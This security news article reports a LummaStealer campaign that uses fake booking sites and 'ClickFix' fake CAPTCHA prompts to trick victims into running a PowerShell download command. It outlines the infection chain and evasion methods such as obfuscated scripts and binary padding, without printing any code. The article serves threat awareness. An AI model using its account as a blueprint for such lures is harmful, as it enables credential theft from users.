A recent cyber attack has been uncovered, leveraging fake booking websites to distribute the LummaStealer malware.
This sophisticated campaign exploits users’ trust in legitimate booking platforms by employing fake CAPTCHA prompts, a technique known as ClickFix, to trick victims into executing malicious commands on their systems.
The attack begins with a phishing email or link that redirects users to a fake booking confirmation page, which appears legitimate due to its HTTPS connection and resemblance to well-known booking sites like Booking.com.
Infection Chain and Techniques
The infection process involves multiple stages. Initially, users are directed to a fake payment confirmation URL, which then leads to a booking itinerary page with a CAPTCHA verification prompt.
This prompt instructs users to open the Windows Run dialog and execute a PowerShell command, bypassing antivirus detection.
The command is copied into the clipboard via an obfuscated JavaScript script, which is decrypted from a ROT13-encoded PHP script.
This script is part of a larger social engineering tactic designed to deceive users into compromising their systems.
Once executed, the PowerShell command downloads and executes the LummaStealer payload from a fake booking website URL.
Notably, the malware samples involved in this campaign are significantly larger than previous versions, often disguised as legitimate installers to evade detection.
According to G Data, these larger files use techniques like binary padding to delay analysis and trigger file size limitations in security tools.
Global Impact
LummaStealer, operating under a Malware-as-a-Service (MaaS) model, has been observed targeting users globally, with cases reported in countries such as the Philippines and Germany.
This malware was initially spread through platforms like GitHub and Telegram but has now shifted to exploiting booking websites and malvertising.
The campaign’s global scope and evolving tactics suggest a growing threat landscape, with parallels to the infamous Emotet banking trojan in terms of versatility and prevalence.
As cybersecurity threats continue to evolve, vigilance from both security researchers and users is crucial to mitigate these risks.
The use of sophisticated social engineering techniques like ClickFix and the adaptation of malware to evade detection highlight the need for enhanced security measures and awareness about phishing scams and malicious campaigns.
%20(1)%20(1).webp?w=1200&resize=1200,0&ssl=1 "Severe Sante PACS Server Vulnerabilities Allow Arbitrary File Downloads")
%20(1).webp?w=1200&resize=1200,0&ssl=1 "Hackers Target California Cryobank, Compromising Donor and Customer Data")
